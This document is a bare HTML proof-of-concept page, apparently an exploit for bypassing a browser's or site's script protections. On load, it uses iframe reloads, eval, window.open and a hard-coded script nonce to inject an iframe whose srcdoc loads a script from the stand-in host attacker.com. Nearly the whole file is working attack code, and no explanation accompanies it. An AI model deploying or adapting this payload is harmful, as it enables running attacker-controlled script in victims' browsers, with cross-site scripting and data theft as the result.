<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
<iframe id="GGGGGTWHxaGGGGG" src="about:blank"></iframe>
<script>
window.onload = function() {
    GGGGGTWHxaGGGGG.onload=_=>GGGGGTWHxaGGGGG.contentWindow.eval("w=window.open('about:blank'); w.document.write('<iframe id=GGGTWHxaGGG src=about:blank><\/iframe><script nonce=123>GGGTWHxaGGG.addEventListener(\x22load\x22,()=>{GGGTWHxaGGG.srcdoc=\x22<script src=https://attacker.com/static/static.js><\\/script>\x22;},{once:true});<\/script>');");GGGGGTWHxaGGGGG.contentWindow.location.reload();
};
</script>
</body>
</html>